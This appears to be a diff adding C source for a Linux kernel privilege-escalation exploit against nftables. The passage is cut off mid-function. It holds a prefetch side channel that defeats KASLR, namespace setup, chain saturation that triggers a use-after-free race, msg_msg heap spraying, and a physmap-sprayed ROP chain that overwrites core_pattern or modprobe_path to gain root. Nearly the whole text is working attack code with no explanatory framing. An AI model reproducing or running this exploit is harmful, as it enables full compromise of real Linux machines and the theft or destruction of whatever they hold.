} + + votes[vote] = best_addr; + printf("[*] prefetch %s: intel vote %d best=%#lx i=%lu t=%zu second=%zu\n", + name, vote, (unsigned long)best_addr, best_idx, best, second); + } + + restore_prefetch_cpu(&oldset, have_old); + + uint64_t candidate = 0; + int balance = 0; + for (int i = 0; i < INTEL_PREFETCH_VOTES; i++) { + if (!votes[i]) + continue; + if (balance == 0) { + candidate = votes[i]; + balance = 1; + } else if (candidate == votes[i]) { + balance++; + } else { + balance--; + } + } + + int count = 0; + for (int i = 0; i < INTEL_PREFETCH_VOTES; i++) + if (votes[i] == candidate) + count++; + + if (candidate && count > INTEL_PREFETCH_VOTES / 2) { + printf("[+] prefetch %s: intel found=%#lx votes=%d/%d\n", + name, (unsigned long)candidate, count, INTEL_PREFETCH_VOTES); + return candidate; + } + + printf("[!] prefetch %s: intel majority failed candidate=%#lx votes=%d/%d\n", + name, (unsigned long)candidate, count, INTEL_PREFETCH_VOTES); + return 0; +} + +static uint64_t prefetch_scan_first_hit(const char *name, uint64_t start, + uint64_t end, uint64_t step) +{ + cpu_set_t oldset; + int have_old = 0; + unsigned long idx = 0; + uint64_t found = 0; + + if (!prefetch_threshold) + detect_prefetch_threshold(); + + pin_prefetch_cpu(&oldset, &have_old); + (void)prefetch_measure_tries(0xffffffff00000000ULL, + PREFETCH_SCAN_TRIES); + size_t bad = prefetch_measure_tries(0xffffffff00000000ULL, + PREFETCH_SCAN_TRIES); + size_t threshold = prefetch_threshold; + if (bad + PREFETCH_THRESHOLD_MARGIN < threshold) + threshold = bad + PREFETCH_THRESHOLD_MARGIN; + printf("[*] prefetch %s: bad=%zu threshold=%zu step=%#lx\n", + name, bad, threshold, (unsigned long)step); + + for (uint64_t addr = start; addr < end; addr += step, idx++) { + size_t t = prefetch_measure_tries(addr, PREFETCH_SCAN_TRIES); + if ((idx & 0x3ff) == 0) + printf("[*] prefetch %s: addr=%#lx i=%lu t=%zu\n", + name, (unsigned long)addr, idx, t); + if (t > threshold) { + size_t confirm = prefetch_measure(addr); + if (confirm > threshold) { + found = addr; + printf("[+] prefetch %s: found=%#lx i=%lu t=%zu/%zu\n", + name, (unsigned long)addr, idx, t, confirm); + break; + } + printf("[*] prefetch %s: transient=%#lx t=%zu/%zu\n", + name, (unsigned long)addr, t, confirm); + } + } + + restore_prefetch_cpu(&oldset, have_old); + if (!found) + printf("[!] prefetch %s: no hit\n", name); + return found; +} + +static void add_u64_candidate(uint64_t *arr, int *n, int max, uint64_t val) +{ + if (!val) + return; + for (int i = 0; i < *n; i++) + if (arr[i] == val) + return; + if (*n < max) + arr[(*n)++] = val; +} + +static uint64_t leak_kernel_text_prefetch(void) +{ + if (prefetch_cpu_is_intel()) { + return prefetch_scan_lowest_vote("kernel-entry", KTEXT_SCAN_START, + KTEXT_SCAN_END, KTEXT_INTEL_STEP, + off_entry_syscall, 1); + } + return prefetch_scan_first_hit("kernel-text", KTEXT_SCAN_START, + KTEXT_SCAN_END, KTEXT_SCAN_STEP); +} + +static uint64_t leak_direct_mapping_prefetch(void) +{ + uint64_t coarse, ref_start, ref_end, refined; + + if (prefetch_cpu_is_intel()) { + coarse = prefetch_scan_lowest_vote("direct-map", DIRECT_MAP_START, + DIRECT_MAP_END, + INTEL_DIRECT_COARSE_STEP, 0, 0); + if (!coarse) + return 0; + + ref_start = coarse > 2 * INTEL_DIRECT_COARSE_STEP ? + coarse - 2 * INTEL_DIRECT_COARSE_STEP : + DIRECT_MAP_START; + if (ref_start < DIRECT_MAP_START) + ref_start = DIRECT_MAP_START; + ref_end = coarse + INTEL_DIRECT_COARSE_STEP; + if (ref_end > DIRECT_MAP_END || ref_end < coarse) + ref_end = DIRECT_MAP_END; + + refined = prefetch_scan_lowest_vote("direct-map-refine", ref_start, + ref_end, + INTEL_DIRECT_REFINE_STEP, 0, 0); + return refined ? refined : coarse; + } + + coarse = prefetch_scan_first_hit("direct-map", DIRECT_MAP_START, + DIRECT_MAP_END, DIRECT_MAP_COARSE_STEP); + if (!coarse) + return 0; + + ref_start = coarse > 3 * DIRECT_MAP_COARSE_STEP ? + coarse - 3 * DIRECT_MAP_COARSE_STEP : DIRECT_MAP_START; + if (ref_start < DIRECT_MAP_START) + ref_start = DIRECT_MAP_START; + ref_end = coarse + DIRECT_MAP_COARSE_STEP; + if (ref_end > DIRECT_MAP_END || ref_end < coarse) + ref_end = DIRECT_MAP_END; + + refined = prefetch_scan_first_hit("direct-map-refine", ref_start, + ref_end, DIRECT_MAP_REFINE_STEP); + return refined ? refined : coarse; +} + +static uint64_t kbase_cands[MAX_KBASE_CANDS]; +static int n_kbase_cands = 0; +static uint64_t phbase_cands[MAX_PHBASE_CANDS]; +static int n_phbase_cands = 0; + +static int leak_entrybleed(void) { + printf("[*] Entrybleed: scanning kbase with prefetch side channel...\n"); + kbase = leak_kernel_text_prefetch(); + + if (kbase < 0xffffffff81000000ULL || + kbase >= 0xffffffffc1000000ULL) { + printf("[-] Entrybleed: kbase %#lx out of range\n", + (unsigned long)kbase); + kbase = 0; + return 0; + } + + n_kbase_cands = 0; + add_u64_candidate(kbase_cands, &n_kbase_cands, MAX_KBASE_CANDS, kbase); + for (int d = -16; d <= 16 && n_kbase_cands < MAX_KBASE_CANDS; d++) { + if (d == 0) continue; + uint64_t c = kbase + d * KTEXT_SCAN_STEP; + if (c < 0xffffffff81000000ULL || c >= 0xffffffffc1000000ULL) continue; + add_u64_candidate(kbase_cands, &n_kbase_cands, + MAX_KBASE_CANDS, c); + } + printf("[+] kbase=%#lx (%d candidates)\n", + (unsigned long)kbase, n_kbase_cands); + + if (use_userblob) { + phbase = 0xffff888000000000ULL; + printf("[*] Entrybleed: skipping physmap scan (userblob mode)\n"); + return 1; + } + + printf("[*] Entrybleed: scanning direct-map base with prefetch side channel...\n"); + phbase = leak_direct_mapping_prefetch(); + + if (phbase < DIRECT_MAP_START || phbase >= DIRECT_MAP_END) { + printf("[-] Entrybleed: phbase %#lx out of range\n", + (unsigned long)phbase); + phbase = 0; + return 0; + } + + n_phbase_cands = 0; + add_u64_candidate(phbase_cands, &n_phbase_cands, + MAX_PHBASE_CANDS, phbase); + int spiral[] = {-1, 1, -2, 2, -3, 3, -4, 4, -5, 5, -6, 6}; + for (size_t s = 0; s < sizeof(spiral) / sizeof(spiral[0]) && + n_phbase_cands < MAX_PHBASE_CANDS; s++) { + uint64_t c = phbase + spiral[s] * DIRECT_MAP_CAND_STEP; + if (c < DIRECT_MAP_START || c >= DIRECT_MAP_END) continue; + add_u64_candidate(phbase_cands, &n_phbase_cands, + MAX_PHBASE_CANDS, c); + } + printf("[+] phbase=%#lx (%d candidates)\n", + (unsigned long)phbase, n_phbase_cands); + return 1; +} + +/* ================================================================ + * Namespace setup + * ================================================================ */ +// @step(name="Namespace Setup") +static void xwrite(const char *path, const char *str) { + int file_fd = open(path, O_WRONLY | O_CLOEXEC); + if (file_fd < 0) die(path); + if (write(file_fd, str, strlen(str)) < 0) { /* ignore */ } + close(file_fd); +} +static void setup_ns(void) { + uid_t uid = getuid(); + gid_t gid = getgid(); + if (uid == 0) { + if (setresgid(DROP_GID, DROP_GID, DROP_GID) < 0) + die("setresgid(drop)"); + if (setresuid(DROP_UID, DROP_UID, DROP_UID) < 0) + die("setresuid(drop)"); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + uid = getuid(); + gid = getgid(); + } + if (unshare(CLONE_NEWUSER) < 0) die("unshare(NEWUSER)"); + xwrite("/proc/self/setgroups", "deny\n"); + char mapbuf[64]; + snprintf(mapbuf, sizeof(mapbuf), "0 %u 1\n", uid); + xwrite("/proc/self/uid_map", mapbuf); + snprintf(mapbuf, sizeof(mapbuf), "0 %u 1\n", gid); + xwrite("/proc/self/gid_map", mapbuf); + if (setresgid(0, 0, 0) < 0) die("setresgid(root)"); + if (setresuid(0, 0, 0) < 0) die("setresuid(root)"); + if (unshare(CLONE_NEWNET) < 0) die("unshare(NEWNET)"); + int lo_sock = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (lo_sock >= 0) { + struct ifreq ifr = {}; + strncpy(ifr.ifr_name, "lo", IFNAMSIZ-1); + ioctl(lo_sock, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + ioctl(lo_sock, SIOCSIFFLAGS, &ifr); + close(lo_sock); + } +} + +/* ================================================================ + * Netlink helpers + * ================================================================ */ +static int nl_sock = -1; +static uint32_t nl_seq; + +static void *nlmsg_tail(struct nlmsghdr *nlh) { + return (char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len); +} +static int nla_put(struct nlmsghdr *nlh, size_t mx, uint16_t type, + const void *data, size_t len) { + size_t nw = NLMSG_ALIGN(nlh->nlmsg_len) + NLA_ALIGN(NLA_HDRLEN + len); + if (nw > mx) return -1; + struct nlattr *attr = (struct nlattr *)nlmsg_tail(nlh); + attr->nla_type = type; + attr->nla_len = NLA_HDRLEN + len; + if (len) memcpy((char*)attr + NLA_HDRLEN, data, len); + nlh->nlmsg_len = nw; + return 0; +} +static int nlastr(struct nlmsghdr *nlh, size_t mx, uint16_t type, const char *str) { + return nla_put(nlh, mx, type, str, strlen(str)+1); +} +static int nla32(struct nlmsghdr *nlh, size_t mx, uint16_t type, uint32_t val) { + val = htonl(val); + return nla_put(nlh, mx, type, &val, 4); +} +static struct nlattr *nla_nest_s(struct nlmsghdr *nlh, size_t mx, uint16_t type) { + size_t nw = NLMSG_ALIGN(nlh->nlmsg_len) + NLA_ALIGN(NLA_HDRLEN); + if (nw > mx) return nullptr; + struct nlattr *attr = (struct nlattr *)nlmsg_tail(nlh); + attr->nla_type = type | NLA_F_NESTED; + attr->nla_len = NLA_HDRLEN; + nlh->nlmsg_len = nw; + return attr; +} +static void nla_nest_e(struct nlmsghdr *nlh, struct nlattr *attr) { + attr->nla_len = (char *)nlmsg_tail(nlh) - (char *)attr; +} + +static int nl_open(void) { + nl_sock = socket(AF_NETLINK, SOCK_RAW|SOCK_CLOEXEC, NETLINK_NETFILTER); + if (nl_sock < 0) return -1; + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + sa.nl_pid = (uint32_t)getpid(); + if (bind(nl_sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) return -1; + int bufsz = NL_BUFSZ; + setsockopt(nl_sock, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + setsockopt(nl_sock, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + return 0; +} + +static size_t batch_hdr(char *buf, size_t mx, uint16_t type, uint16_t res) { + (void)mx; + struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + memset(nlh, 0, sizeof(*nlh)); + nlh->nlmsg_type = type; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = ++nl_seq; + nlh->nlmsg_pid = getpid(); + nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(nlh); + nfg->nfgen_family = 0; + nfg->version = NFNETLINK_V0; + nfg->res_id = htons(res); + return NLMSG_ALIGN(nlh->nlmsg_len); +} + +static int recv_ack(uint32_t seq) { + char buf[8192]; + struct timeval tv = {RECV_TIMEOUT_SEC, 0}; + setsockopt(nl_sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + for (;;) { + ssize_t n = recv(nl_sock, buf, sizeof(buf), 0); + if (n <= 0) return -errno; + for (struct nlmsghdr *nlh = (struct nlmsghdr *)buf; + NLMSG_OK(nlh, (unsigned)n); nlh = NLMSG_NEXT(nlh, n)) { + if (nlh->nlmsg_type != NLMSG_ERROR) continue; + struct nlmsgerr *err = (struct nlmsgerr *)NLMSG_DATA(nlh); + if (nlh->nlmsg_seq == seq) return err->error; + } + } +} + +#define NFT_T(msg) ((NFNL_SUBSYS_NFTABLES << 8) | (msg)) +#define NLC (NLM_F_CREATE | NLM_F_EXCL) + +static int nft_newtable(uint8_t fam, const char *name) { + char buf[4096]; + size_t off = 0; + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_BEGIN, NFNL_SUBSYS_NFTABLES); + struct nlmsghdr *op = (struct nlmsghdr *)(buf+off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWTABLE); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + uint32_t seq_num = ++nl_seq; + op->nlmsg_seq = seq_num; + op->nlmsg_pid = getpid(); + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(op); + nfg->nfgen_family = fam; + nfg->version = NFNETLINK_V0; + nlastr(op, sizeof(buf), NFTA_TABLE_NAME, name); + off += NLMSG_ALIGN(op->nlmsg_len); + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_END, NFNL_SUBSYS_NFTABLES); + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + sendto(nl_sock, buf, off, 0, (struct sockaddr*)&sa, sizeof(sa)); + return recv_ack(seq_num); +} + +static int nft_newchain(uint8_t fam, const char *tab, const char *chain, + uint32_t hooknum, int32_t prio) { + char buf[4096]; + size_t off = 0; + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_BEGIN, NFNL_SUBSYS_NFTABLES); + struct nlmsghdr *op = (struct nlmsghdr *)(buf+off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWCHAIN); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + uint32_t seq_num = ++nl_seq; + op->nlmsg_seq = seq_num; + op->nlmsg_pid = getpid(); + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(op); + nfg->nfgen_family = fam; + nfg->version = NFNETLINK_V0; + nlastr(op, sizeof(buf), NFTA_CHAIN_TABLE, tab); + nlastr(op, sizeof(buf), NFTA_CHAIN_NAME, chain); + struct nlattr *hk = nla_nest_s(op, sizeof(buf), NFTA_CHAIN_HOOK); + nla32(op, sizeof(buf), NFTA_HOOK_HOOKNUM, hooknum); + nla32(op, sizeof(buf), NFTA_HOOK_PRIORITY, (uint32_t)prio); + nla_nest_e(op, hk); + nla32(op, sizeof(buf), NFTA_CHAIN_POLICY, NF_ACCEPT); + off += NLMSG_ALIGN(op->nlmsg_len); + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_END, NFNL_SUBSYS_NFTABLES); + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + sendto(nl_sock, buf, off, 0, (struct sockaddr*)&sa, sizeof(sa)); + return recv_ack(seq_num); +} + +/* ================================================================ + * IPv6 hook saturation + * ================================================================ */ +// @step(name="Saturate IPv6 LOCAL_OUT Hooks") +static int saturate_ipv6_hooks(void) { + printf("[*] creating ipv6 table t6\n"); + int err = nft_newtable(NFPROTO_IPV6, "t6"); + if (err && err != -EEXIST) { + printf("[-] newtable ipv6: %d\n", err); + return -1; + } + printf("[*] saturating ipv6 LOCAL_OUT...\n"); + int i; + for (i = 0; i < IPV6_SATURATE_MAX; i++) { + char name[32]; + snprintf(name, sizeof(name), "c%d", i); + err = nft_newchain(NFPROTO_IPV6, "t6", name, + NF_INET_LOCAL_OUT, 0); + if (err == -E2BIG) { + printf("[+] ipv6 LOCAL_OUT saturated at %d chains\n", i); + break; + } + if (err) { + printf("[-] ipv6 chain %d: %d\n", i, err); + return -1; + } + if (i % PROGRESS_INTERVAL == 0) printf(" ... %d\n", i); + } + if (i >= IPV6_SATURATE_MAX) { + printf("[-] failed to saturate (reached max)\n"); + return -1; + } + printf("[*] creating inet table ti\n"); + err = nft_newtable(NFPROTO_INET, "ti"); + if (err && err != -EEXIST) { + printf("[-] newtable inet: %d\n", err); + return -1; + } + return 0; +} + +/* ================================================================ + * Physmap spray + ROP blob + * + * Uses runtime-resolved offsets from kernelXDK instead of + * hardcoded #defines. + * ================================================================ */ +// @step(name="Physmap Spray with ROP Blob") +static void spray_physmap(void) { + size_t sz = (size_t)physmap_mb << 20; + phys_region = mmap(nullptr, sz, PROT_READ|PROT_WRITE, + MAP_SHARED|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); + if (phys_region == MAP_FAILED) die("mmap physmap"); + printf("[+] physmap: %d MB at %p\n", physmap_mb, phys_region); +} + +static uint64_t leak_physmap_kva(void) { + int pagemap_fd = open("/proc/self/pagemap", O_RDONLY); + if (pagemap_fd < 0) return 0; + uint64_t vaddr = (uint64_t)phys_region; + uint64_t entry = 0; + if (pread(pagemap_fd, &entry, 8, (off_t)(vaddr/4096)*8) != 8) { + close(pagemap_fd); + return 0; + } + close(pagemap_fd); + if (!(entry & (1ULL<<63))) return 0; + uint64_t pfn = entry & ((1ULL<<55)-1); + if (!pfn) return 0; + return phbase + pfn * 4096; +} + +/* + * Build a fake nft_rule_blob containing a 4-expression ROP chain. + * + * Each expression uses nft_immediate_ops to write 16 bytes into + * nft_do_chain's register file at the dreg corresponding to the + * return address region on the stack. + * + * Effective ROP chain when nft_do_chain returns: + * ret+0: pop rsi; pop rdi; ret (load args for strcpy) + * ret+8: src_va (path string in this page) + * ret+16: target_va (core_pattern address) + * ret+24: strcpy (overwrite core_pattern) + * ret+32: pop rdi; ret (load msleep arg) + * ret+40: 0x7FFFFFFF (~25 days) + * ret+48: msleep (keep system alive) + * ret+56: return_thunk (clean return) + */ +static void rop_build_blob(uint8_t *blob, uint64_t page_kva) { + uint64_t target_va = use_core_pattern ? + (kbase + off_core_pattern) : (kbase + off_modprobe); + uint64_t nft_imm_ops = kbase + off_nft_imm_ops; + uint64_t pop_rsi_rdi = kbase + OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK; + uint64_t pop_rdi = kbase + OFF_POP_RDI_JMP_RETURN_THUNK; + uint64_t strcpy_va = kbase + off_strcpy; + uint64_t msleep_va = kbase + off_msleep; + uint64_t ret_thunk = kbase + off_return_thunk; + uint64_t src_va = page_kva + PATH_OFFSET; + + memset(blob, 0, BLOB_TOTAL_SIZE); + + /* blob_gen->size: rdp0(8) + 4*expr(128) + rdp1(8) = 144 = 0x90 */ + uint64_t blob_size = 0x90; + memcpy(blob + 0x000, &blob_size, 8); + + /* Rule descriptor: dlen = 4 expressions * 0x20 = 128, is_last = 0 */ + uint64_t rdp0 = (128ULL << 1) | 0; + memcpy(blob + 0x008, &rdp0, 8); + + /* Expr 0: pop rsi=src_va, pop rdi=target_va -> DREG_RET (ret addr) */ + memcpy(blob + 0x010, &nft_imm_ops, 8); /* expr->ops */ + uint64_t *d1 = (uint64_t*)(blob + 0x018); + d1[0] = pop_rsi_rdi; + d1[1] = src_va; + blob[0x028] = DREG_RET; + blob[0x029] = 16; /* dreg, len */ + + /* Expr 1: strcpy(target, src_va) -> DREG_RET4 (ret+16) */ + memcpy(blob + 0x030, &nft_imm_ops, 8); + uint64_t *d2 = (uint64_t*)(blob + 0x038); + d2[0] = target_va; + d2[1] = strcpy_va; + blob[0x048] = DREG_RET4; + blob[0x049] = 16; + + /* Expr 2: pop rdi=MSLEEP_FOREVER -> DREG_RET8 (ret+32) */ + memcpy(blob + 0x050, &nft_imm_ops, 8); + uint64_t *d3 = (uint64_t*)(blob + 0x058); + d3[0] = pop_rdi; + d3[1] = MSLEEP_FOREVER; + blob[0x068] = DREG_RET8; + blob[0x069] = 16; + + /* Expr 3: msleep(MSLEEP_FOREVER) -> DREG_RET12 (ret+48) */ + memcpy(blob + 0x070, &nft_imm_ops, 8); + uint64_t *d4 = (uint64_t*)(blob + 0x078); + d4[0] = msleep_va; + d4[1] = ret_thunk; + blob[0x088] = DREG_RET12; + blob[0x089] = 16; + + /* End-of-rules marker */ + uint64_t rdp1 = 1; + memcpy(blob + 0x090, &rdp1, 8); +} + +// @step(name="Fill Physmap with ROP Blob") +static void rop_fill_physmap(void) { + uint8_t blob[256]; + rop_build_blob(blob, g_page_kva); + + const char *payload_str = use_core_pattern ? + g_core_cmd : g_modprobe_path; + size_t path_len = strlen(payload_str) + 1; + size_t sz = (size_t)physmap_mb << 20; + for (size_t o = 0; o < sz; o += 4096) { + uint8_t *pg = (uint8_t*)phys_region + o; + memset(pg, 0, PATH_OFFSET + 64); + memcpy(pg, blob, BLOB_TOTAL_SIZE); + memcpy(pg + PATH_OFFSET, payload_str, path_len); + } + printf("[+] physmap filled with ROP blob + %s (%s)\n", + use_core_pattern ? "core_pattern" : "modprobe_path", + payload_str); +} + +/* ================================================================ + * msg_msg spray (kmalloc-256 reclaim for nft_base_chain) + * + * msg_msg header size and nft_base_chain field offsets are + * resolved from kernelXDK at runtime. + * ================================================================ */ +// @step(name="msg_msg Spray for nft_base_chain Reclaim") +static int spray_qids[NUM_SPRAY_QS]; +static uint64_t mtext_sz = 0; /* computed: 256 - MSG_MSG_SIZE */ + +static void spray_build_msg(char *msgbuf, uint64_t page_kva) { + long mtype = 1; + memcpy(msgbuf, &mtype, sizeof(long)); + char *mtext = msgbuf + sizeof(long); + memset(mtext, 0, mtext_sz); + + /* blob_gen_0 at alloc offset -> mtext offset = alloc_off - MSG_MSG_SIZE */ + memcpy(mtext + (NFT_BASE_CHAIN_OFFS_BLOB_GEN0 - MSG_MSG_SIZE), &page_kva, 8); + /* blob_gen_1 */ + memcpy(mtext + (NFT_BASE_CHAIN_OFFS_BLOB_GEN1 - MSG_MSG_SIZE), &page_kva, 8); + /* policy (NF_ACCEPT=1) */ + mtext[NFT_BASE_CHAIN_OFFS_POLICY - MSG_MSG_SIZE] = 1; + /* flags (NFT_CHAIN_BASE bit 0) */ + mtext[NFT_BASE_CHAIN_OFFS_FLAGS - MSG_MSG_SIZE] = 0x01; +} + +static void spray_msgs(uint64_t page_kva) { + size_t bufsz = sizeof(long) + mtext_sz; + char *msgbuf = (char *)calloc(1, bufsz); + spray_build_msg(msgbuf, page_kva); + + int total = 0; + for (int i = 0; i < NUM_SPRAY_QS; i++) { + spray_qids[i] = msgget(IPC_PRIVATE, IPC_CREAT|0600); + if (spray_qids[i] < 0) die("msgget spray"); + for (int j = 0; j < MSGS_PER_Q; j++) { + long mt = j + 1; + memcpy(msgbuf, &mt, sizeof(long)); + if (msgsnd(spray_qids[i], msgbuf, mtext_sz, + IPC_NOWAIT) < 0) { + if (errno == EAGAIN) break; + die("msgsnd spray"); + } + total++; + } + } + free(msgbuf); + printf("[+] sprayed %d msg_msg into kmalloc-256\n", total); +} + +static void spray_free(void) { + size_t bufsz = sizeof(long) + mtext_sz; + char *tmp = (char *)malloc(bufsz); + for (int i = 0; i < NUM_SPRAY_QS; i++) { + for (int j = 0; j < MSGS_PER_Q; j++) + msgrcv(spray_qids[i], tmp, mtext_sz, 0, IPC_NOWAIT); + msgctl(spray_qids[i], IPC_RMID, nullptr); + } + free(tmp); +} + +/* ================================================================ + * UDP flood thread (CPU 1) + * ================================================================ */ +// @step(name="Race: UDP Flood Thread") +static void *race_udp_flood_thread(void *unused) { + (void)unused; + cpu_pin(FLOOD_CPU); + + int s = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (s < 0) die("socket udp"); + struct sockaddr_in dst = {}; + dst.sin_family = AF_INET; + dst.sin_port = htons(UDP_PORT); + dst.sin_addr.s_addr = htonl(INADDR_LOOPBACK); + + #define FLOOD_BATCH 128 + char pkt[64]; + memset(pkt, 0x41, sizeof(pkt)); + + struct iovec iov[FLOOD_BATCH]; + struct mmsghdr msgs[FLOOD_BATCH]; + memset(msgs, 0, sizeof(msgs)); + for (int i = 0; i < FLOOD_BATCH; i++) { + iov[i].iov_base = pkt; + iov[i].iov_len = sizeof(pkt); + msgs[i].msg_hdr.msg_name = &dst; + msgs[i].msg_hdr.msg_namelen = sizeof(dst); + msgs[i].msg_hdr.msg_iov = &iov[i]; + msgs[i].msg_hdr.msg_iovlen = 1; + } + + unsigned long batch_count = 0; + while (race_running && !race_won) { + sendmmsg(s, msgs, FLOOD_BATCH, 0); + batch_count++; + /* Yield every Nth batch for RCU quiescent state on CPU 1 */ + if (batch_count % FLOOD_YIELD_INTERVAL == 0) + sched_yield(); + } + close(s); + return nullptr; +} + +/* ================================================================ + * Dedicated spray thread (CPU 0) -- reclaims freed chain slot + * ================================================================ */ +// @step(name="Race: Dedicated msg_msg Spray Thread") +#define DEDICATED_SPRAY_QS 512 +#define DEDICATED_SPRAY_BURST 8 + +static int dedicated_spray_qids[DEDICATED_SPRAY_QS]; + +static void *race_spray_thread(void *arg) { + uint64_t page_kva = (uint64_t)(uintptr_t)arg; + cpu_pin(RACE_CPU); + + size_t bufsz = sizeof(long) + mtext_sz; + char *msgbuf = (char *)calloc(1, bufsz); + spray_build_msg(msgbuf, page_kva); + char *rcvbuf = (char *)malloc(bufsz); + + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + dedicated_spray_qids[q] = msgget(IPC_PRIVATE, IPC_CREAT|0600); + + int qi = 0; + unsigned long iter = 0; + + while (race_running && !race_won) { + /* The first alloc after kfree should take the freed slot; extra + * burst entries cover scheduler jitter before RCU quiescence. */ + for (int burst = 0; burst < DEDICATED_SPRAY_BURST; burst++) { + long mt = (long)((iter * DEDICATED_SPRAY_BURST + burst) % 256) + 1; + memcpy(msgbuf, &mt, sizeof(long)); + if (msgsnd(dedicated_spray_qids[qi], msgbuf, mtext_sz, + IPC_NOWAIT) < 0) { + qi = (qi + 1) % DEDICATED_SPRAY_QS; + break; + } + } + /* sched_yield: quiescent state for CPU 0, unblocks synchronize_rcu */ + sched_yield(); + iter++; + + if (iter % RACE_PROGRESS_INTERVAL == 0) { + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + while (msgrcv(dedicated_spray_qids[q], + rcvbuf, mtext_sz, + 0, IPC_NOWAIT) >= 0) + ; + qi = 0; + } + } + + for (int q = 0; q < DEDICATED_SPRAY_QS; q++) + msgctl(dedicated_spray_qids[q], IPC_RMID, nullptr); + free(msgbuf); + free(rcvbuf); + return nullptr; +} + +/* ================================================================ + * INET chain creation loop (race trigger) + * ================================================================ */ +// @step(name="Race: INET NEWCHAIN Trigger Loop") +static int race_sock = -1; +static uint32_t race_seq = 0; + +static int race_nl_open(void) { + race_sock = socket(AF_NETLINK, SOCK_RAW|SOCK_CLOEXEC, + NETLINK_NETFILTER); + if (race_sock < 0) return -1; + struct sockaddr_nl sa = {}; + sa.nl_family = AF_NETLINK; + if (bind(race_sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) + return -1; + int bufsz = RACE_NL_BUFSZ; + setsockopt(race_sock, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + setsockopt(race_sock, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + return 0; +} + +static void *race_inet_chain_thread(void *arg) { + (void)arg; + cpu_pin(RACE_CPU); + + if (race_nl_open() < 0) { + printf("[-] race_nl_open failed\n"); + return nullptr; + } + + char buf[4096]; + char drain[4096]; + unsigned long i = 0; + time_t t0 = time(nullptr); + uint32_t pid_val = 0; + socklen_t slen = sizeof(struct sockaddr_nl); + struct sockaddr_nl bound; + getsockname(race_sock, (struct sockaddr*)&bound, &slen); + pid_val = bound.nl_pid; + + while (race_running && !race_won) { + size_t off = 0; + + /* BATCH_BEGIN */ + { + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + off); + memset(nlh, 0, sizeof(*nlh)); + nlh->nlmsg_type = NFNL_MSG_BATCH_BEGIN; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = ++race_seq; + nlh->nlmsg_pid = pid_val; + nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(nlh); + nfg->nfgen_family = 0; + nfg->version = NFNETLINK_V0; + nfg->res_id = htons(NFNL_SUBSYS_NFTABLES); + off += NLMSG_ALIGN(nlh->nlmsg_len); + } + + /* NEWCHAIN (INET) -- IPv4 succeeds, IPv6 fails (-E2BIG) */ + { + char cname[32]; + snprintf(cname, sizeof(cname), "r%lu", i % CHAIN_NAME_MOD); + + struct nlmsghdr *op = (struct nlmsghdr *)(buf + off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWCHAIN); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + op->nlmsg_seq = ++race_seq; + op->nlmsg_pid = pid_val; + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *nfg = (struct nfgenmsg *)NLMSG_DATA(op); + nfg->nfgen_family = NFPROTO_INET; + nfg->version = NFNETLINK_V0; + + size_t op_max = sizeof(buf) - off; + nlastr(op, op_max, NFTA_CHAIN_TABLE, "ti"); + nlastr(op, op_max, NFTA_CHAIN_NAME, cname); + struct nlattr *hk = nla_nest_s(op, op_max, NFTA_CHAIN_HOOK); + nla32(op, op_max, NFTA_HOOK_HOOKNUM, NF_INET_LOCAL_OUT); + nla32(op, op_max, NFTA_HOOK_PRIORITY, 0); + nla_nest_e(op, hk); + nla32(op, op_max, NFTA_CHAIN_POLICY, NF_ACCEPT); + off += NLMSG_ALIGN(op->nlmsg_len); + } + + /* BATCH_END -- triggers abort path with synchronize_rcu() */ + { + struct nlmsghdr *nlh = (struct nlmsghdr *)(buf + off); + memset(nlh, 0, sizeof(*nlh)); + nlh->nlmsg_type = NFNL_MSG_BATCH_END; + nlh->nlmsg_flags = NLM_F_REQUEST; + nlh->nlmsg_seq = ++race_seq; + nlh->nlmsg_pid = pid_val; + 